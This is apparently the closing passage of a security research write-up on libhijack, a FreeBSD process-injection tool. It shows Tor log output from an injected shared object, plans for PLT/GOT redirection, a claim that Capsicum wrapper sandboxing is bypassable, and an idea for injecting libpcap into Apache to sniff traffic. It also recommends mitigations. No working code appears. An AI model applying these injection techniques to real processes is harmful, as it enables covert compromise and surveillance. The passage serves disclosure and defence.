Oct 04 18:59:25.000 [notice] Parsing GEOIP IPv4 file /home/shawn/installs/share/tor/geoip.                                                                                         
Oct 04 18:59:26.000 [notice] Parsing GEOIP IPv6 file /home/shawn/installs/share/tor/geoip6.                                                                                        
Oct 04 18:59:26.000 [notice] Bootstrapped 0%: Starting                                   
Oct 04 18:59:27.000 [notice] Starting with guard context "default"                       
Oct 04 18:59:27.000 [notice] Bootstrapped 80%: Connecting to the Tor network             
Oct 04 18:59:28.000 [notice] Bootstrapped 85%: Finishing handshake with first hop        
Oct 04 18:59:29.000 [notice] Bootstrapped 90%: Establishing a Tor circuit                
Oct 04 18:59:31.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.                                                                    
Oct 04 18:59:31.000 [notice] Bootstrapped 100%: Done                                     
This output is from an injected shared object. You have been pwned.

The Future of libhijack

Writing devious code in assembly is cumbersome. Assembly doesn't scale
well to multiple architectures. Instead, we would like to write our
devious code in C, compiling to a shared object that gets injected
anonymously. This requires writing a remote RTLD within libhijack and
is in progress. Writing a remote RTLD will take a while as doing so is
not an easy task.

Additionally, creation of a general-purpose helper library that gets
injected would be helpful. It could aid in PLT/GOT redirection
attacks, possibly storing the addresses of functions we've previously
hijacked. This work is dependent on the remote RTLD.

libhijack currently lacks documentation. Once the ABI and API
stabilize, formal documentation will be written.


Conclusion

Using libhijack, we can easily create anonymous memory mappings,
inject arbitrary code into them, and hijack the PLT/GOT on FreeBSD. On
HardenedBSD, a hardened derivative of FreeBSD, libhijack is fully
mitigated through PaX NOEXEC.

We've demonstrated that wrapper-style Capsicum is ineffective on
FreeBSD. Through the use of libhijack, we emulate a control flow
hijack in which the application is forced to call sandbox_open and
fdlopen on the resulting file descriptor.

Anonymous injection of full shared objects, along with their
dependencies, will be supported in the future.
Imagine injecting libpcap into Apache to sniff traffic whenever "GET
/pcap" is sent.

In order to prevent abuse of PTrace, FreeBSD should set the
security.bsd.unprivileged_proc_debug sysctl to 0 by default. In order to
prevent process manipulation, FreeBSD should implement PaX NOEXEC.

libhijack can be found at